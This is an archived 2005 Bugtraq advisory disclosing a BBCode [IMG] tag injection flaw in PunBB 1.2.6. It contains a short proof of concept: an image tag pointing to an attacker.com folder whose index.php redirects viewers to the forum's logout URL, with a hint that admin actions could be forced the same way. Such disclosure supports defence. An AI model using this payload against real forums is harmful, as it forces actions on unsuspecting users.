lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: 29 Aug 2005 08:49:29 -0000
From: y3dips@...o.or.id
To: bugtraq@...urityfocus.com
Subject: PunBB BBCode IMG Tag Script Injection Vulnerability


ECHO_ADV_22$2005

---------------------------------------------------------------------------
            PunBB BBCode IMG Tag Script Injection Vulnerability
---------------------------------------------------------------------------

Author: y3dips
Date: August, 20th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv22-y3dips-2005.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Version: 1.2.6 and most likely below
url : http://punbb.org
Author: Rickard Andersson
Description:

PunBB is a fast and lightweight PHP powered discussion board. It is released under the GNU Public License. Its primary goal is to be a faster, smaller and less graphic alternative to otherwise excellent discussion boards such as phpBB, Invision Power Board or vBulletin. PunBB has fewer features than many other discussion boards, but is generally faster and outputs smaller pages.

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

According to the issue that affect PHPBB discovered by easyex recently at http://www.securityfocus.com/bid/14555/info , so it also affected in another bulletin board or forum that allow BBcode such as PunBB.

The issue is due to a failure of the application to properly sanitize user-supplied input in bbcode '[IMG]' tags included in a message or user signature (if allowed , default is off) .

Successful exploitation of this vulnerability could permit the injection of arbitrary HTML or script code into the browser of an unsuspecting user in the context of the affected site.


Exploit: 
~~~~~~~~

just post a message that include

[img]http://attacker.com/yuckfou.png[/img]

yuckfou.png is a folder , and include some "index.php" file

---- index.php ----

<?php
header("Location: http://target.com/punbb1.2.6/login.php?action=out&id=2"); ?>

---- eof ------

so , user with id=2 if open the topics with attacker message include will automatically "logout"

maybe some other interesting in command could put in "index.php" with admin priveledged *_^


THATS all

Fix
~~~

Vendor allready contacted but no responses

Shoutz:

~~~~~~~



~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff
~ waraxe , LINUX, Heintz , slimjim100 , lunix, easyex all member of waraxe

~ newbie_hacker@...oogroups.com ,

~ #e-c-h-o & #aikmel @DALNET

Contact:
~~~~~~~~

y3dips || echo|staff 
Homepage: http://y3dips.echo.or.id/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ